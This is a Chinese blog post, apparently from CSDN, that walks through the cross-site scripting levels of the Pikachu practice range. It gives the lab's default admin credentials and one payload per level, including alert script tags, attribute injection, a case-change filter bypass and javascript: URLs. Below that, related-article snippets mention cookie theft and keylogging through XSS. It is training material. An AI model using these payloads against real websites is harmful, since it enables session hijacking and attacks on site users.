pikachu通关之XSS实操

最新推荐文章于 2024-06-01 16:48:56 发布
最新推荐文章于 2024-06-01 16:48:56 发布
阅读量92 收藏
点赞数 1
分类专栏: 学习 网络安全 pikachu靶场 文章标签: xss 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/keeplearn10/article/details/132188606
版权

1、反射型xss(get)

在url直接输入​  <script>alert(1)</script>

<script>alert(1)</script>

 2.反射性xss(post)

先登录账号(右上角点击一下提示可得)

账号:admin密码:123456

<script>alert(1)</script>

 3、存储型xss

 同样输入 <script>alert(1)</script>

4、DOM型xss

 检查代码可得输入内容转化为超链接,输入相关的网页地址即可,如http://baidu.com

 5、DOM型xss-x

 ' οnclick="alert('xss')">

6、xss盲打

现在输入框内分别输入下列代码,点击提交,发现没反应,接着点击右上角提示登陆后台

<script>alert('xss1')</script>
<script>alert('xss2')</script>

 在原url上补充/admin_login.php

 登录账号admin密码123456,点击Login则会有弹窗

 7、 xss之过滤(大小写绕过)

<Script>alert(1)</Script>

 8、xss之htmlspecialchars

'onclick='alert(1)'

 9 、xss之href输出

javascript:alert(1)

 10、xss之js输出

</script><script>alert(1)</script>

 

keeplearn10
关注
专栏目录
XSS解析——pikachu靶场
Aquarius_ego的博客
05-10 1205
XSS讲解——用pikachu靶场复现xss的四种危害:劫持用户cookie、框架钓鱼、挂马、键盘记录
PikachuXSS
weixin_48621644的博客
10-14 3144
小羊学安全 任重而道远~
使用pikachu管理工具下的XSS后台进行实战
北冥同学的成长记录笔记
07-29 3652
pikachu管理工具下的XSS后台是一个通过Cookie窃取和利用、钓鱼攻击、键盘行为记录这三个实战型实验来帮助学习者理解XSS漏洞的原理和危害的一个平台。旨在帮助学习者在实战深入理解理论,从而可以更好的防御XSS漏洞。
Pikachu-xss
m0_71518346的博客
12-08 734
alert("xss")点击提交出现一段文字应该是直接打到后台了,找到后台,登录进去看看,后台地址是/xssblind/admin_login.php登录即可触发xss。x'alert('xss') 使用单引号闭合$mc,再由闭合script标签,而后构造script标签,写入alert弹窗,成功弹出。直接在输入框输入alert("xss")
Pikachu系列——XSS
Zlirving_的博客
05-13 664
Pikachu靶场系列持续更新~   要像追剧追番一样追下去哦   实验二 —— XSS XSS概述 Cross-Site Scripting 简称为“CSS”(跨站脚本攻击),为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类型: 1.反射性XSS; 2.存储型XSS; 3.DOM型XSS; DOMXSS、存储XSS与反射XSS有啥不同? 反射型:会经服务器处理,可在当前返回的数据包发现XSS代码并显示在页面; 存储型:经服务器处理,存储在页
Pikachu-----Cross-Site Scripting(XSS
m0_65712192的博客
12-17 932
Pikachu-----Cross-Site Scripting(XSS
pikachu漏洞练习平台XSS
m0_55854679的博客
05-09 3535
XSS案例 get方式获取cookie图解 pkxss管理后台使用介绍 在绝对路径D:\phpstudy_pro\WWW\pikachu-master\pkxss下找到pkxss管理后台。 也可以点击,pikachu靶场的左侧漏洞栏最下面的管理工具下的xss后台,并进行初始化安装。 初始化安装后,输入页面提示的用户名和密码,即可成功进入pkxss管理后台。 get方式获取cookie方法 在目录D:\phpstudy_pro\WWW\pikachu-master\pkxss\xcookie下找
pikachu通关教程(XSS
Bu2n的博客
12-07 1577
pikachu靶场之XSS学习笔记
Mbys_Lettuce的博客
10-01 475
XSS漏洞一直被评估为web漏洞危害较大的漏洞,在OWASP TOP10的排名一直属于前三的江湖地位。XSS是一种发生在前端浏览器端的漏洞,所以其危害的对象也是前端用户。形成XSS漏洞的主要原因是程序对输入和输出没有做合适的处理,导致“精心构造”的字符输出在前端时被浏览器当作有效代码解析执行从而产生危害。因此在XSS漏洞的防范上,一般会采用“对输入进行过滤”和“输出进行转义”的方式进行处理:输入过滤:对输入进行过滤,不允许可能导致XSS攻击的字符输入;
Pikachu Xss的简单防御剖析
m123456wer的博客
04-20 179
Pickachu Xss的简单防御剖析
pikachu靶场全通关教程
07-20
这个是刚开始学网络安全渗透的靶场练习心得,分享给大家
pikachu漏洞练习平台之xss(持续更新
m0_55854679的博客
05-04 2119
概述 XSS(跨站脚本) Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类型: 1.反射性XSS; 2.存储型XSS; 3.DOM型XSS; XSS漏洞可以用来进行钓鱼攻击、前端js挖矿、用户cookie的获取,甚至可以结合浏览器自身的漏洞对用户主机进行远程控制等。 XSS是一种发生在web前端浏览器端的漏洞,所以其危害的对象也是前端用户。 形成XSS漏洞的主要原因是程序对输入和输出没有做合适的处理,导致“
小皮pikachuxss后台报错解决
2302_76986722的博客
09-13 1722
初始化会出现这样的报错:找不到数据库以及。
Pikachu第二弹:XSS
Pisces_mango的博客
08-14 1699
一、反射型xss(get) 1.输入语句,发现有长度限制,按F12,修改源码字符长度 2.输入语句 3.出现弹窗 二、反射型xss(post) 1.输入账号密码登录 2.登录XSS后台,然后搭建恶意站点 这里是以POST的方式提交的,参数内容不会出现在URL,这时候我们不能直接把我们的恶意代码嵌入到URL,我们需要自己搭一个恶意站点,然后在网站上放一个post表单,将存放post表单的链接发送给受害者,诱导受害者点击这个post表单会自动向漏洞服务器提交一个POST请求,实
使用pikachu Xss后台出现的问题
最新发布
m0_74608722的博客
06-01 305
在进行xss-x漏洞实验的时候,一直出现上述错误,查找了很多,终于找到问题所在pikachu使用的数据库为同一个数据库,千万别被pkxss误导,以为pikachu还有一个数据库为pkxss,所以在配置的时候写下如下图的
第23篇:XSS绕过防护盲打某SRC官网后台
ABC_123的博客
09-19 1769
Part1 前言已经N年没挖SRC了,前几年曾有一段时间对XSS漏洞挖掘特别热衷,像反射型XSS、存储型XSS、DOM型XSS等挖得很上瘾,记下了很多笔记。遗憾的是多数平台都不愿意接收XSS漏洞,哪怕是存储型XSS漏洞给的评分都很低,因为XSS不能造成直接危害,利用起来有困难。所以当时花费了2天的时间,绕过各种防护及过滤,盲打到了一个SRC电商官网的后台。正好公众号文章写到现在,也缺少一篇讲解...
pikachu存储型XSS钓鱼攻击后台收不到数据的原因!
qq_63526803的博客
04-23 1218
XSS钓鱼攻击后台获取不到数据的原因。
XSS平台搭建及后台使用(cookie获取)
2302_79885863的博客
04-12 1493
点击XSS后台,这就是我们收集cookie的网站,第一次进入需要初始化,如果你的数据库密码改了的就要去靶场的根目录的pkxss/inc/config.inc.php把链接数据库密码改成一致(案列靶场是这个,反正就是要找到这个配置文件)执行完之做了一个php的重定向,做完上面操作,保存完数据库之后,重新给你访问了一下这个网址,这个网址应该改成存在漏洞的网站的IP。然后我们把留言删除,刚刚我们知识测试是否存在有这个漏洞,然后我们现在想要获取cookie,需要构造代码了。这里的IP是能和虚拟机通信的,
DOM型XSS;cookie获取及XSS后台使用XSS钓鱼演示;XSS获取键盘记录实验演示
qq_44696653的博客
04-21 2234
DOM型XSS DOM简介(摘录) 通过JavaScript,可以重构整个HTML文档,可以添加、移除、改变或重排页面上的项目。 要改变页面的某个东西,JavaScript就需要获得对HTML文档所有元素进行添加、移动、改变或移除的方法和属性,都是通过文档对象模型来获得的(DOM)。 所以就可以将DOM理解为访问HTML的标准编程接口。 DOM型XSS漏洞演示 ...
pikachu靶场xss漏洞通关
08-10
通关Pikachu靶场的XSS漏洞,你可以按照以下步骤进行操作: 1. 首先,了解XSS漏洞的原理和类型。XSS(跨站脚本攻击)是一种常见的Web漏洞,攻击者通过在网页注入恶意脚本,利用用户的浏览器执行恶意代码,从而...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值